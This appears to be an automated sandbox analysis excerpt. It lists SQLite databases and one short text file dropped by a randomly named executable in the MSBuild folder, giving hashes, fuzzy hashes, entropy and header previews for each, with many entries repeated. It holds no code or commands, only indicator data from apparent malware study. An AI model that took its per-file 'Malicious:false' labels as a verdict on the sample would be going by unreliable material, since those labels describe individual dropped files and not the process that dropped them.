                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):25
                                                                                      Entropy (8bit):4.373660689688184
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:r1hVytX:/Ul
                                                                                      MD5:375A50AA0635E37A7AFD31664D5864F6
                                                                                      SHA1:D3A685F1F9D509B277BB80A36E23760E06662270
                                                                                      SHA-256:6E5DEFCE6C3DE31D373704D8737CE3FD9D4EA002EED49C3A3C9CCF1208A82F86
                                                                                      SHA-512:AB7B22B39D2F81EE2B91E993EEFCBD559DA0F151F30C5FAB58872620B8B94457199106A9A378EEC85B4628D0B1B1C79BA60E2274258F875FDF943F01A1BCF74E
                                                                                      Malicious:false
                                                                                      Preview:PEnmFMKs54MNLRu2fXpIrrbHr
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
